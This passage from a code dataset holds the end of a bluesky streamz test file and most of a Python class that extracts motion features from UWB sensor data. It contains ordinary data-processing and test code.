= None\n self.averager = None\n super().__init__()\n\n def start(self, doc):\n \"\"\"\n Create the stream after seeing the start document\n\n The callback looks for the 'average' key in the start document to\n configure itself.\n \"\"\"\n # Grab the average key\n self.n = doc.get('average', self.n)\n # Define our nodes\n if not self.in_node:\n self.in_node = streamz.Source(stream_name='Input')\n\n self.averager = self.in_node.partition(self.n)\n\n def average_events(cache):\n average_evt = dict()\n desc_id = cache[0]['descriptor']\n # Check that all of our events came from the same configuration\n if not all([desc_id == evt['descriptor'] for evt in cache]):\n raise Exception('The events in this bundle are from '\n 'different configurations!')\n # Use the last descriptor to avoid strings and objects\n data_keys = self.raw_descriptors[desc_id]['data_keys']\n for key, info in data_keys.items():\n # Information from non-number fields is dropped\n if info['dtype'] in ('number', 'array', 'integer'):\n # Average together\n average_evt[key] = np.mean([evt['data'][key]\n for evt in cache], axis=0)\n return {'data': average_evt, 'descriptor': desc_id}\n\n self.out_node = self.averager.map(average_events)\n self.out_node.sink(super().event)\n super().start(doc)\n\n def event(self, doc):\n \"\"\"Send an Event through the stream\"\"\"\n self.in_node.emit(doc)\n\n def stop(self, doc):\n \"\"\"Delete the stream when run stops\"\"\"\n self.in_node = None\n self.out_node = None\n self.averager = None\n super().stop(doc)\n\n\ndef test_straight_through_stream(RE, hw):\n # Just a stream that sinks the events it receives\n ss = NegativeStream()\n # Create callback chain\n c = CallbackCounter()\n d = DocCollector()\n ss.subscribe(c)\n ss.subscribe(d.insert)\n # Run a basic plan\n RE(stepscan(hw.det, hw.motor), {'all': ss})\n # Check that our metadata is there\n assert c.value == 10 + 1 + 2 # events, descriptor, start and stop\n assert d.start[0]['stream_level'] == 'boring'\n desc = d.descriptor[d.start[0]['uid']][0]\n events = d.event[desc['uid']]\n print(desc)\n print([evt['data'] for evt in events])\n tmp_valid = all([evt['data'][key] <= 0\n for evt in events\n for key in evt['data'].keys()])\n assert tmp_valid\n tmp_valid = all([key in desc['data_keys']\n for key in events[0]['data'].keys()])\n assert tmp_valid\n\n\n@requires_streamz\ndef test_average_stream(RE, hw):\n # Create callback chain\n avg = AverageStream(10)\n c = CallbackCounter()\n d = DocCollector()\n avg.subscribe(c)\n avg.subscribe(d.insert)\n # Run a basic plan\n RE(stepscan(hw.det, hw.motor), {'all': avg})\n assert c.value == 1 + 1 + 2 # events, descriptor, start and stop\n # See that we made sensible descriptor\n start_uid = d.start[0]['uid']\n assert start_uid in d.descriptor\n desc_uid = d.descriptor[start_uid][0]['uid']\n assert desc_uid in d.event\n evt = d.event[desc_uid][0]\n assert evt['seq_num'] == 1\n assert all([key in d.descriptor[start_uid][0]['data_keys']\n for key in evt['data'].keys()])\n # See that we returned the correct average\n assert evt['data']['motor'] == -0.5 # mean of range(-5, 5)\n assert evt['data']['motor_setpoint'] == -0.5 # mean of range(-5, 5)\n assert start_uid in d.stop\n assert d.stop[start_uid]['num_events'] == {'primary': 1}\n","repo_name":"bluesky/bluesky","sub_path":"bluesky/tests/test_streams.py","file_name":"test_streams.py","file_ext":"py","file_size_in_byte":4904,"program_lang":"python","lang":"en","doc_type":"code","stars":125,"dataset":"github-code","pt":"37"} +{"seq_id":"41586343650","text":"import functools\nfrom operator import or_\n\nimport numpy as np\nimport pandas as pd\nfrom scipy.signal import find_peaks, peak_prominences, peak_widths\nfrom sklearn import preprocessing\n\nfrom .uwb_motion_filters import TrayMotionButterFiltFiltFilter, TrayMotionSavGolFilter\nfrom .utils.log import logger\nfrom .utils.util import filter_by_data_type\n\n\nclass FeatureExtraction:\n def __init__(\n self,\n resample_frequency=\"100ms\",\n position_filter=TrayMotionButterFiltFiltFilter(useSosFiltFilt=True),\n velocity_filter=TrayMotionSavGolFilter(),\n ):\n self.resample_frequency = resample_frequency\n self.position_filter = position_filter\n self.velocity_filter = velocity_filter\n\n self.le = preprocessing.LabelEncoder()\n self.le.fit([\"dwtag100\", \"pt202\"])\n\n VELOCITY_COLUMNS = [\n \"quality\",\n \"anchor_count\",\n # \"x_position\",\n # \"y_position\",\n # \"z_position\",\n \"x_position_smoothed\",\n \"y_position_smoothed\",\n \"z_position_smoothed\",\n \"x_velocity_smoothed\",\n \"y_velocity_smoothed\",\n \"z_velocity_smoothed\",\n \"x_velocity_smoothed_magnitude\",\n \"y_velocity_smoothed_magnitude\",\n \"z_velocity_smoothed_magnitude\",\n \"velocity_vector_magnitude\",\n \"velocity_vector_magnitude_xy\",\n \"x_velocity_mean\",\n \"y_velocity_mean\",\n \"z_velocity_mean\",\n \"velocity_average_mean\",\n \"velocity_vector_magnitude_mean\",\n \"velocity_vector_magnitude_mean_xy\",\n \"x_velocity_stddev\",\n \"y_velocity_stddev\",\n \"z_velocity_stddev\",\n \"velocity_average_stddev\",\n \"velocity_vector_magnitude_stddev\",\n \"velocity_vector_magnitude_stddev_xy\",\n \"x_velocity_skew\",\n \"y_velocity_skew\",\n \"z_velocity_skew\",\n \"velocity_average_skew\",\n \"velocity_vector_magnitude_skew\",\n \"velocity_vector_magnitude_skew_xy\",\n \"x_velocity_variance\",\n \"y_velocity_variance\",\n \"z_velocity_variance\",\n \"velocity_average_variance\",\n \"velocity_vector_magnitude_variance\",\n \"velocity_vector_magnitude_variance_xy\",\n \"x_velocity_kurtosis\",\n \"y_velocity_kurtosis\",\n \"z_velocity_kurtosis\",\n \"velocity_average_kurtosis\",\n \"velocity_vector_magnitude_kurtosis\",\n \"velocity_vector_magnitude_kurtosis_xy\",\n \"x_y_velocity_correlation\",\n \"x_z_velocity_correlation\",\n \"y_z_velocity_correlation\",\n \"x_velocity_correlation_sum\",\n \"y_velocity_correlation_sum\",\n \"z_velocity_correlation_sum\",\n ]\n\n ACCELERATION_COLUMNS = [\n \"x_acceleration_normalized\",\n \"y_acceleration_normalized\",\n \"z_acceleration_normalized\",\n \"acceleration_vector_magnitude\",\n \"x_acceleration_mean\",\n \"y_acceleration_mean\",\n \"z_acceleration_mean\",\n \"acceleration_average_mean\",\n \"acceleration_vector_magnitude_mean\",\n \"x_acceleration_sum\",\n \"y_acceleration_sum\",\n \"z_acceleration_sum\",\n \"acceleration_average_sum\",\n \"acceleration_vector_magnitude_sum\",\n \"x_acceleration_min\",\n \"y_acceleration_min\",\n \"z_acceleration_min\",\n \"acceleration_average_min\",\n \"acceleration_vector_magnitude_min\",\n \"x_acceleration_max\",\n \"y_acceleration_max\",\n \"z_acceleration_max\",\n \"acceleration_average_max\",\n \"acceleration_vector_magnitude_max\",\n \"x_acceleration_stddev\",\n \"y_acceleration_stddev\",\n \"z_acceleration_stddev\",\n \"acceleration_average_stddev\",\n \"acceleration_vector_magnitude_stddev\",\n \"x_acceleration_skew\",\n \"y_acceleration_skew\",\n \"z_acceleration_skew\",\n \"acceleration_average_skew\",\n \"acceleration_vector_magnitude_skew\",\n \"x_acceleration_variance\",\n \"y_acceleration_variance\",\n \"z_acceleration_variance\",\n \"acceleration_average_variance\",\n \"acceleration_vector_magnitude_variance\",\n \"x_acceleration_kurtosis\",\n \"y_acceleration_kurtosis\",\n \"z_acceleration_kurtosis\",\n \"acceleration_average_kurtosis\",\n \"acceleration_vector_magnitude_kurtosis\",\n \"x_acceleration_energy\",\n \"y_acceleration_energy\",\n \"z_acceleration_energy\",\n \"acceleration_average_energy\",\n \"acceleration_vector_magnitude_energy\",\n \"x_y_acceleration_correlation\",\n \"x_z_acceleration_correlation\",\n \"y_z_acceleration_correlation\",\n \"x_acceleration_correlation_sum\",\n \"y_acceleration_correlation_sum\",\n \"z_acceleration_correlation_sum\",\n ]\n\n GYROSCOPE_COLUMNS = [\"x_dps\", \"y_dps\", \"z_dps\"]\n\n MAGNETOMETER_COLUMNS = [\"x_μT\", \"y_μT\", \"z_μT\"]\n\n ALL_FEATURE_COLUMNS = [\n \"device_part_number_label_id\",\n *VELOCITY_COLUMNS,\n *ACCELERATION_COLUMNS,\n *GYROSCOPE_COLUMNS,\n *MAGNETOMETER_COLUMNS,\n ]\n\n def extract_motion_features_for_multiple_devices(\n self,\n df_uwb_data: pd.DataFrame,\n entity_type=\"all\",\n fillna=None,\n filter_wos=True,\n join=\"outer\",\n ):\n if (\n (df_uwb_data is None)\n or ((df_uwb_data is not None and len(df_uwb_data) == 0))\n or ((df_uwb_data is not None and \"entity_type\" not in df_uwb_data.columns))\n ):\n return None\n\n df_uwb_data = df_uwb_data.copy()\n\n if entity_type is None:\n entity_type = \"all\"\n\n if entity_type.lower() != \"all\":\n df_uwb_data = df_uwb_data[df_uwb_data[\"entity_type\"].str.lower() == entity_type.lower()]\n\n if filter_wos:\n df_uwb_data = self.filter_uwb_data_by_acceleration_activity(df_uwb_data=df_uwb_data)\n\n all_features = []\n for device_id, df_device_uwb_data in df_uwb_data.groupby(by=\"device_id\"):\n logger.info(f\"Calculating motion features for device ID {device_id}\")\n\n df_device_uwb_data = df_device_uwb_data.sort_index()\n\n df_device_position = filter_by_data_type(df_device_uwb_data, \"position\")\n df_device_acceleration = filter_by_data_type(df_device_uwb_data, \"accelerometer\")\n df_device_gyroscope = filter_by_data_type(df_device_uwb_data, \"gyroscope\")\n df_device_magnetometer = filter_by_data_type(df_device_uwb_data, \"magnetometer\")\n\n df_features = self.extract_motion_features(\n df_position=df_device_position,\n df_acceleration=df_device_acceleration,\n df_gyroscope=df_device_gyroscope,\n df_magnetometer=df_device_magnetometer,\n fillna=fillna,\n filter_wos=filter_wos,\n join=join,\n )\n df_features[\"device_id\"] = device_id\n\n device_part_number = df_device_uwb_data[\"device_part_number\"].unique()[0].lower()\n df_features[\"device_part_number_label_id\"] = self.le.transform([device_part_number])[0]\n\n all_features.append(df_features)\n\n response = None\n if len(all_features) > 0:\n response = pd.concat(all_features)\n\n return response\n\n def extract_tray_motion_features_for_multiple_devices(self, df_uwb_data):\n return self.extract_motion_features_for_multiple_devices(\n df_uwb_data=df_uwb_data,\n entity_type=\"tray\",\n )\n\n def extract_motion_features(\n self,\n df_position,\n df_acceleration,\n df_gyroscope=None,\n df_magnetometer=None,\n fillna=\"forward_backward\",\n filter_wos=True,\n join=\"outer\",\n ):\n df_velocity_features = pd.DataFrame(columns=FeatureExtraction.VELOCITY_COLUMNS)\n if df_position is not None:\n df_velocity_features = self.extract_velocity_features(df=df_position)\n\n df_acceleration_features = pd.DataFrame(columns=FeatureExtraction.ACCELERATION_COLUMNS)\n if df_acceleration is not None:\n df_acceleration_features = self.extract_acceleration_features(df=df_acceleration, filter_wos=filter_wos)\n\n df_gyroscope_features = pd.DataFrame(columns=FeatureExtraction.GYROSCOPE_COLUMNS)\n if df_gyroscope is not None and len(df_gyroscope) > 0:\n df_gyroscope_features = self.extract_gyroscope_features(df=df_gyroscope)\n\n df_magnetometer_features = pd.DataFrame(columns=FeatureExtraction.MAGNETOMETER_COLUMNS)\n if df_magnetometer is not None and len(df_magnetometer) > 0:\n df_magnetometer_features = self.extract_magnetometer_features(df=df_magnetometer)\n\n df_features = (\n df_velocity_features.join(df_acceleration_features, how=join)\n .join(df_gyroscope_features, how=join)\n .join(df_magnetometer_features, how=join)\n )\n\n df_features = df_features.reindex(\n columns=[\n *FeatureExtraction.VELOCITY_COLUMNS,\n *FeatureExtraction.ACCELERATION_COLUMNS,\n *FeatureExtraction.GYROSCOPE_COLUMNS,\n *FeatureExtraction.MAGNETOMETER_COLUMNS,\n ]\n )\n\n df_features.replace([np.inf, -np.inf], np.nan, inplace=True)\n\n logger.info(f\"Using fillna method: {fillna}\")\n if fillna == \"average\":\n df_features.fillna(df_features.mean(), inplace=True)\n elif fillna == \"drop\":\n df_features.dropna(inplace=True)\n elif fillna == \"pad\":\n df_features.fillna(method=\"pad\", inplace=True)\n elif fillna == \"forward_backward\":\n logger.info(\"Applying forward_backward filter to feature set\")\n df_features = df_features.fillna(method=\"ffill\").fillna(method=\"bfill\")\n elif fillna == \"interpolate\": # linear interpolation, use bfill to fill in nan's at front of dataframe\n logger.info(\"Applying standard bfill interpolation filter to feature set\")\n df_features = df_features.interpolate().fillna(method=\"bfill\")\n\n return df_features\n\n def extract_velocity_features(self, df):\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_position\", \"y\": \"y_position\", \"z\": \"z_position\"}, inplace=True)\n\n if \"x_meters\" in df.columns:\n df.rename(\n columns={\"x_meters\": \"x_position\", \"y_meters\": \"y_position\", \"z_meters\": \"z_position\"}, inplace=True\n )\n\n df = self.average_xyz_duplicates(df, x_col=\"x_position\", y_col=\"y_position\", z_col=\"z_position\")\n\n df = df.reindex(columns=[\"x_position\", \"y_position\", \"z_position\", \"quality\", \"anchor_count\"])\n df = self.regularize_index_and_smooth(df)\n df = self.calculate_velocity_features(df=df)\n df = df.sort_index()\n return df\n\n def extract_acceleration_features(self, df, filter_wos=True):\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_gs\", \"y\": \"y_gs\", \"z\": \"z_gs\"}, inplace=True)\n\n df = self.average_xyz_duplicates(df, x_col=\"x_gs\", y_col=\"y_gs\", z_col=\"z_gs\")\n df = self.normalize_acceleration(df, x_col=\"x_gs\", y_col=\"y_gs\", z_col=\"z_gs\")\n\n # df_acceleration_for_device_by_peaks = self.remove_wos_acceleration_peaks(\n # df=df,\n # x_col=\"x_acceleration_normalized\",\n # y_col=\"y_acceleration_normalized\",\n # z_col=\"z_acceleration_normalized\",\n # require_peak_across_all_axes=False)\n\n if filter_wos:\n df = self.remove_wos_initial_acceleration_reading_by_time_gaps(df)\n\n df = df.reindex(columns=[\"x_gs\", \"y_gs\", \"z_gs\"])\n df = self.regularize_index_and_smooth(df)\n df = self.calculate_acceleration_features(\n df=df,\n )\n df = df.drop(columns=[\"x_gs\", \"y_gs\", \"z_gs\"]).sort_index()\n return df\n\n def extract_gyroscope_features(self, df):\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_dps\", \"y\": \"y_dps\", \"z\": \"z_dps\"}, inplace=True)\n\n df = self.average_xyz_duplicates(df, x_col=\"x_dps\", y_col=\"y_dps\", z_col=\"z_dps\")\n\n df = df.reindex(columns=[\"x_dps\", \"y_dps\", \"z_dps\"])\n df = self.regularize_index_and_smooth(df)\n return df\n\n def extract_magnetometer_features(self, df):\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_μT\", \"y\": \"y_μT\", \"z\": \"z_μT\"}, inplace=True)\n\n df = self.average_xyz_duplicates(df, x_col=\"x_μT\", y_col=\"y_μT\", z_col=\"z_μT\")\n\n df = df.reindex(columns=[\"x_μT\", \"y_μT\", \"z_μT\"])\n df = self.regularize_index_and_smooth(df)\n return df\n\n def regularize_index_and_smooth(self, df):\n df = df.copy()\n\n if len(df) == 0:\n return df\n\n df = df.astype(float)\n df = df.loc[~df.index.duplicated()].copy()\n\n start = df.index.min().floor(self.resample_frequency)\n end = df.index.max().ceil(self.resample_frequency)\n\n regularized_index = pd.date_range(start=start, end=end, freq=self.resample_frequency)\n df = df.reindex(df.index.union(regularized_index))\n df = df.interpolate(method=\"time\", limit=5, limit_area=\"inside\")\n\n # Drop all rows that have an NA value (excluding the anchor_count column)\n df = df.reindex(regularized_index).dropna(subset=df.columns.difference([\"anchor_count\"]))\n # if fillna == 'interpolate':\n # df = df.interpolate(method=\"linear\", limit_area=\"inside\")\n # else:\n # df = df.fillna(value=0.0) # .dropna(subset=df.columns.difference([\"anchor_count\"]))\n\n # df = df.reindex(regularized_index)\n df = df.bfill().ffill()\n return df\n\n def detect_peaks(self, np_array, width=None, min_height_as_percentage_of_max=0.8):\n \"\"\"\n This method using Scipy find_peaks to extract peaks, peak 'widths', and peak 'prominences'.\n\n Note, data should be normalized before using this method.\n\n :param np_array: Expects a numpy array of values. This method works on a single axis of data at a time.\n :param width: See the Scipy find_peaks::width attribute. In short, this method defines the min/max width of a peak\n :param min_height_as_percentage_of_max: See the Scipy find_peaks::height attribute. This method sets the minimum height based on a percentage of the max value in the provided numpy array.\n :return: (peaks, widths, prominences)\n \"\"\"\n np_array = np_array.copy()\n np_array.reset_index(drop=True, inplace=True)\n\n # find_peaks will miss peaks at the front and back of an array unless we prepend and append min values to the array being analyzed\n augmented_np_array = np.concatenate(([min(np_array)], np_array, [min(np_array)]))\n\n peaks, _ = find_peaks(\n augmented_np_array, width=width, height=(max(augmented_np_array) * min_height_as_percentage_of_max, None)\n )\n widths = peak_widths(augmented_np_array, peaks)[0]\n prominences = peak_prominences(augmented_np_array, peaks)[0]\n\n # compensate for the prepended value in the augmented_x array that was analyzed\n peaks -= 1\n\n return peaks, widths, prominences\n\n def average_xyz_duplicates(self, df, x_col=\"x\", y_col=\"y\", z_col=\"z\", group_by_cols=None, inplace=False):\n \"\"\"\n Ciholas' IMU system will sometimes output multiple readings at the same time (\"same time\" after we lost access to the Ciholas network_time attribute\")\n\n This method will average the x/y/z values for any of those duplicates and the duplicates will be removed.\n\n :param df: DF with time index\n :param x_col:\n :param y_col:\n :param z_col:\n :params group_by_cols: By default, the dataframe will be deduped by the index. Alternatively, an array of columns can be provided to group by.\n :param inplace:\n :return: Dataframe\n \"\"\"\n if not inplace:\n df = df.copy()\n\n # ['socket_read_time', 'device_id']\n if group_by_cols is None:\n df[\"tmp_group_by_index\"] = df.index\n group_by_cols = [\"tmp_group_by_index\"]\n\n df_averaged = df.groupby(group_by_cols).agg({x_col: np.mean, y_col: np.mean, z_col: np.mean})\n\n df = (\n df.drop_duplicates(group_by_cols)\n .drop(columns=[x_col, y_col, z_col])\n .merge(df_averaged, left_on=group_by_cols, right_index=True, how=\"left\", suffixes=(\"_x\", None))\n )\n\n if \"tmp_group_by_index\" in group_by_cols:\n df = df.drop(columns=[\"tmp_group_by_index\"])\n\n return df\n\n def calculate_velocity_features(self, df, inplace=False):\n if not inplace:\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_position\", \"y\": \"y_position\", \"z\": \"z_position\"}, inplace=True)\n\n df[\"x_position_smoothed\"] = self.position_filter.filter(series=df[\"x_position\"])\n df[\"y_position_smoothed\"] = self.position_filter.filter(series=df[\"y_position\"])\n df[\"z_position_smoothed\"] = self.position_filter.filter(series=df[\"z_position\"])\n # Old method of computing velocity, switched to savgol with deriv=1\n # df['x_velocity_smoothed']=df['x_acceleration_smoothed'].diff().divide(df.index.to_series().diff().apply(lambda dt: dt.total_seconds()))\n # df['y_velocity_smoothed']=df['y_acceleration_smoothed'].diff().divide(df.index.to_series().diff().apply(lambda dt: dt.total_seconds()))\n\n df[\"x_velocity_smoothed\"] = self.velocity_filter.filter(df[\"x_position_smoothed\"], deriv=1)\n df[\"y_velocity_smoothed\"] = self.velocity_filter.filter(df[\"y_position_smoothed\"], deriv=1)\n df[\"z_velocity_smoothed\"] = self.velocity_filter.filter(df[\"z_position_smoothed\"], deriv=1)\n\n df[\"x_velocity_smoothed_magnitude\"] = df[\"x_velocity_smoothed\"].abs()\n df[\"y_velocity_smoothed_magnitude\"] = df[\"y_velocity_smoothed\"].abs()\n df[\"z_velocity_smoothed_magnitude\"] = df[\"z_velocity_smoothed\"].abs()\n\n df[\"velocity_vector_magnitude\"] = (\n df[[\"x_velocity_smoothed_magnitude\", \"y_velocity_smoothed_magnitude\", \"z_velocity_smoothed_magnitude\"]]\n .pow(2)\n .sum(axis=1)\n .pow(0.5)\n )\n\n df[\"velocity_vector_magnitude_xy\"] = (\n df[[\"x_velocity_smoothed_magnitude\", \"y_velocity_smoothed_magnitude\"]].pow(2).sum(axis=1).pow(0.5)\n )\n\n window = pd.tseries.frequencies.to_offset(\n \"2s\"\n ) # int(1 / (pd.tseries.frequencies.to_offset(self.frequency).nanos / 1000000000))\n\n df[\"x_velocity_mean\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).mean()\n df[\"y_velocity_mean\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).mean()\n df[\"z_velocity_mean\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).mean()\n df[\"velocity_average_mean\"] = df[[\"x_velocity_mean\", \"y_velocity_mean\", \"z_velocity_mean\"]].mean(axis=1)\n\n df[\"velocity_vector_magnitude_mean\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).mean()\n )\n df[\"velocity_vector_magnitude_mean_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).mean()\n )\n\n df[\"x_velocity_stddev\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).std()\n df[\"y_velocity_stddev\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).std()\n df[\"z_velocity_stddev\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).std()\n df[\"velocity_average_stddev\"] = df[[\"x_velocity_stddev\", \"y_velocity_stddev\", \"z_velocity_stddev\"]].mean(axis=1)\n\n df[\"velocity_vector_magnitude_stddev\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).std()\n )\n df[\"velocity_vector_magnitude_stddev_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).std()\n )\n\n df[\"x_velocity_skew\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).skew()\n df[\"y_velocity_skew\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).skew()\n df[\"z_velocity_skew\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).skew()\n df[\"velocity_average_skew\"] = df[[\"x_velocity_skew\", \"y_velocity_skew\", \"z_velocity_skew\"]].mean(axis=1)\n\n df[\"velocity_vector_magnitude_skew\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).skew()\n )\n df[\"velocity_vector_magnitude_skew_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).skew()\n )\n\n df[\"x_velocity_variance\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).var()\n df[\"y_velocity_variance\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).var()\n df[\"z_velocity_variance\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).var()\n df[\"velocity_average_variance\"] = df[\n [\"x_velocity_variance\", \"y_velocity_variance\", \"z_velocity_variance\"]\n ].mean(axis=1)\n\n df[\"velocity_vector_magnitude_variance\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).var()\n )\n df[\"velocity_vector_magnitude_variance_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).var()\n )\n\n df[\"x_velocity_kurtosis\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).kurt()\n df[\"y_velocity_kurtosis\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).kurt()\n df[\"z_velocity_kurtosis\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).kurt()\n df[\"velocity_average_kurtosis\"] = df[\n [\"x_velocity_kurtosis\", \"y_velocity_kurtosis\", \"z_velocity_kurtosis\"]\n ].mean(axis=1)\n\n df[\"velocity_vector_magnitude_kurtosis\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).kurt()\n )\n df[\"velocity_vector_magnitude_kurtosis_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).kurt()\n )\n\n df[\"x_y_velocity_correlation\"] = (\n df[\"x_velocity_smoothed_magnitude\"].rolling(window=window).corr(df[\"y_velocity_smoothed_magnitude\"])\n )\n df[\"x_z_velocity_correlation\"] = (\n df[\"x_velocity_smoothed_magnitude\"].rolling(window=window).corr(df[\"z_velocity_smoothed_magnitude\"])\n )\n df[\"y_z_velocity_correlation\"] = (\n df[\"y_velocity_smoothed_magnitude\"].rolling(window=window).corr(df[\"z_velocity_smoothed_magnitude\"])\n )\n df[\"x_velocity_correlation_sum\"] = df[\"x_y_velocity_correlation\"] + df[\"x_z_velocity_correlation\"]\n df[\"y_velocity_correlation_sum\"] = df[\"x_y_velocity_correlation\"] + df[\"y_z_velocity_correlation\"]\n df[\"z_velocity_correlation_sum\"] = df[\"x_z_velocity_correlation\"] + df[\"y_z_velocity_correlation\"]\n\n if not inplace:\n return df\n\n def filter_uwb_data_by_acceleration_activity(self, df_uwb_data: pd.DataFrame, inplace: bool = False):\n \"\"\"\n Filters UWB data by determining the \"active periods\" of each sensor.\n Active periods are periods when acceleration data is being captured. Acceleration data\n is not captured when a device is sleeping due to Wake on Shake. Note, while sleeping,\n position data is reported/captured once a minute. This makes position data a\n little more difficult to work with, so we filter by the acceleration data's behavior.\n\n :param df_uwb_data: UWB data for all devices\n :param inplace: Whether to modify the provided df_uwb_data dataframe directly\n\n :return: A filtered df_uwb_data dataframe\n \"\"\"\n if not inplace:\n df_uwb_data = df_uwb_data.copy()\n\n filtered_uwb_data = []\n for device_id, df_device_uwb_data in df_uwb_data.groupby(by=\"device_id\"):\n logger.info(f\"Filtering UWB data by active sessions based on acceleration data for device ID: {device_id}\")\n\n df_device_accelerometer_data = df_device_uwb_data[df_device_uwb_data[\"type\"] == \"accelerometer\"].copy()\n df_device_accelerometer_data[\"active_session_id\"] = (\n df_device_accelerometer_data.index.to_series().diff() >= pd.to_timedelta(\"60 seconds\")\n ).cumsum()\n\n active_session_start_end_times = []\n for _, df_device_accelerometer_session in df_device_accelerometer_data.groupby(by=[\"active_session_id\"]):\n active_session_start_end_times.append(\n {\n \"start\": df_device_accelerometer_session.index.min(),\n \"end\": df_device_accelerometer_session.index.max(),\n }\n )\n df_active_session_start_end_times = pd.DataFrame(active_session_start_end_times)\n\n def _filter_by_start_end_times(start_end_times):\n return (df_device_uwb_data.index >= start_end_times[\"start\"]) & (\n df_device_uwb_data.index <= start_end_times[\"end\"]\n )\n\n start_end_times_mask_list = df_active_session_start_end_times.apply(_filter_by_start_end_times, axis=1)\n if len(start_end_times_mask_list) > 0:\n start_end_times_or_mask = functools.reduce(or_, start_end_times_mask_list)\n filtered_uwb_data.append(df_device_uwb_data[start_end_times_or_mask])\n\n if len(filtered_uwb_data) > 0:\n response = pd.concat(filtered_uwb_data)\n else:\n response = pd.DataFrame(data=None, columns=df_uwb_data.columns, index=df_uwb_data.index)\n\n return response\n\n def remove_wos_acceleration_peaks(\n self, df, x_col=\"x\", y_col=\"y\", z_col=\"z\", require_peak_across_all_axes=False, inplace=False\n ):\n \"\"\"\n Method was created to correct for erroneous acceleration values introduced by WoS. Wake on Shake (WoS) has the tendency to spike when awaking. When analyzing the data, it appeared this data spike is usually contained to a single reading before the readings report sensible data.\n\n This method will remove all spikes from a provided Dataframe. Use the cols attributes to specify the x/y/z columns.\n\n Note, data should be normalized before using this method.\n\n :param df:\n :param x_col:\n :param y_col:\n :param z_col:\n :param require_peak_across_all_axes: When set to True the method will only remove a \"peak candidate\" if the peak occurred across all dimensions (x, y, and z)\n :param inplace:\n :return: Dataframe\n \"\"\"\n if not inplace:\n df = df.copy()\n\n x_peaks, x_widths, _ = self.detect_peaks(df[x_col], width=1, min_height_as_percentage_of_max=0.6)\n y_peaks, y_widths, _ = self.detect_peaks(df[y_col], width=1, min_height_as_percentage_of_max=0.6)\n z_peaks, z_widths, _ = self.detect_peaks(df[z_col], width=1, min_height_as_percentage_of_max=0.6)\n\n all_peaks = np.concatenate((x_peaks, y_peaks, z_peaks))\n unique_peaks, peak_counts = np.unique(all_peaks, return_counts=True)\n\n peaks_idxs = unique_peaks\n if require_peak_across_all_axes:\n peaks_idxs = []\n for idx, count in enumerate(peak_counts):\n if count >= 3:\n peaks_idxs.append(unique_peaks[idx])\n\n logger.info(f\"Correcting for WoS, dropping {len(peaks_idxs)} indices by identifying acceleration peaks\")\n\n df = df.drop(df.iloc[peaks_idxs].index)\n\n if not inplace:\n return df\n\n def remove_wos_initial_acceleration_reading_by_time_gaps(self, df_acceleration, inplace=False):\n \"\"\"\n Method was created to correct for erroneous acceleration values introduced by WoS.\n\n Scans the provided dataframe for any time gaps (as defined by 0.5 seconds). Removes the first value following a time gap.\n :param inplace:\n :return:\n \"\"\"\n if not inplace:\n df_acceleration = df_acceleration.copy()\n\n df_acceleration[\"gap\"] = df_acceleration.sort_index().index.to_series().diff() > pd.to_timedelta(\"0.5 seconds\")\n drop_index = df_acceleration.loc[df_acceleration[\"gap\"]].index\n\n logger.info(\n f\"Correcting for WoS, dropping {len(drop_index) + 1} indices by searching for time gaps and removing first data instance\"\n )\n\n # Drop the first item that follows each \"gap\" in time, also drop the very first row which won't be identified with the diff() method\n df_acceleration = df_acceleration.drop(drop_index)\n\n if len(df_acceleration) > 0:\n df_acceleration = df_acceleration.drop(df_acceleration.index[0])\n\n if not inplace:\n return df_acceleration\n\n def normalize_acceleration(self, df, x_col=\"x\", y_col=\"y\", z_col=\"z\", inplace=False):\n if not inplace:\n df = df.copy()\n\n df[\"x_acceleration_normalized\"] = np.absolute(np.subtract(df[x_col], df[x_col].mean()))\n df[\"y_acceleration_normalized\"] = np.absolute(np.subtract(df[y_col], df[y_col].mean()))\n df[\"z_acceleration_normalized\"] = np.absolute(np.subtract(df[z_col], df[z_col].mean()))\n\n if not inplace:\n return df\n\n def calculate_acceleration_features(self, df, inplace=False):\n if not inplace:\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_gs\", \"y\": \"y_gs\", \"z\": \"z_gs\"}, inplace=True)\n\n df = self.normalize_acceleration(df, x_col=\"x_gs\", y_col=\"y_gs\", z_col=\"z_gs\")\n\n df[\"acceleration_vector_magnitude\"] = (\n df[[\"x_acceleration_normalized\", \"y_acceleration_normalized\", \"z_acceleration_normalized\"]]\n .pow(2)\n .sum(axis=1)\n .pow(0.5)\n )\n\n window = 